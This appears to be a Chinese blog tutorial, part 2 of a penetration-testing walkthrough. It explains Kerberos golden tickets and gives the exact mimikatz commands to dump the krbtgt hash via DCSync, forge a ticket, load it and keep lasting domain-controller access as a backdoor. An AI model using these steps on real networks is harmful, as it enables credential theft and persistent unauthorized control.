由SQL注入到拿下域控的渗透测试实战演练(2)

在域中，在域中域控账号要登录客户机，需要通过一个认证过程所颁发的通行证，这个通行证就叫做票据，票据又分为黄金票据和白银票据票据一个是用域控用户账户制作，一个是用krbtgt账户（KDC超管账号）制作

金票权限是最大的

这个认证过程就是windows的认证协议-Kerberos

我们通过一张图来大体了解一下什么是Kerberos：

上图演示了大致的票据颁发过程，这中间还有一次客户机和KDC通过AC的一次加密身份验证，真实的Kerberos是一个非常复杂的认证过程

以上只是简单介绍方便理解，通俗来说，就是域控与客户机的认证需要一个通行证（也就是票据）

也就是说有了黄金票据就拥有了KDC的权限，就可以任意访问域内任何一台机器了

接下来进入实操：

首先通过我们创建的haixian账户进入域控，并上传mimitatz

通过

lsadump::dcsync /user:krbtgt

可以抓取krbtgt账户的哈希和securityID，这两者是制作黄金票据的关键：

然后在10.0.1.8这台主机的mimikatz通过

kerberos::golden /admin:administrator /domain:XXX /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7da /ticket:administrator.kiribi

来制作黄金票据，不过这里需要注意securityID的最后-502并不是它的内容，而是下一个ID的内容，制作的时候要注意别掉到坑里去

通过

kerberos::ptt administrator.kiribi

来使本机加载黄金票据

可以看到加载黄金票据前这台10.0.1.8并没有访问域控的权限

加载成功后我们使用10.0.1.8这台机器的cmd尝试访问域控机器的C盘，发现成功，接下来就是老套路包括添加账户等等

在最后不得不感慨一句mimikatz牛X！它的很多功能本文还没有涉及到，感兴趣的读者可以自行百度或谷歌了解~

（注意这里的黄金票据是长期有效的，修改管理员账号密码是没有用的，它所依靠的是KDC，而KDC的密码是在建立域的最初设置的，这个密码一般会很复杂，也很少会改，所以相对与哈希传递，黄金票据才是当之无愧的“后门”）

至此，我们完成了对目标内网的一系列渗透，从最初的sql注入getshell到最后的在域控机器留下后门，几乎包含了经典渗透测试的全过程，所涉及知识与操作较为简单，适合新手阅读

（谢谢大家，溜了溜了~）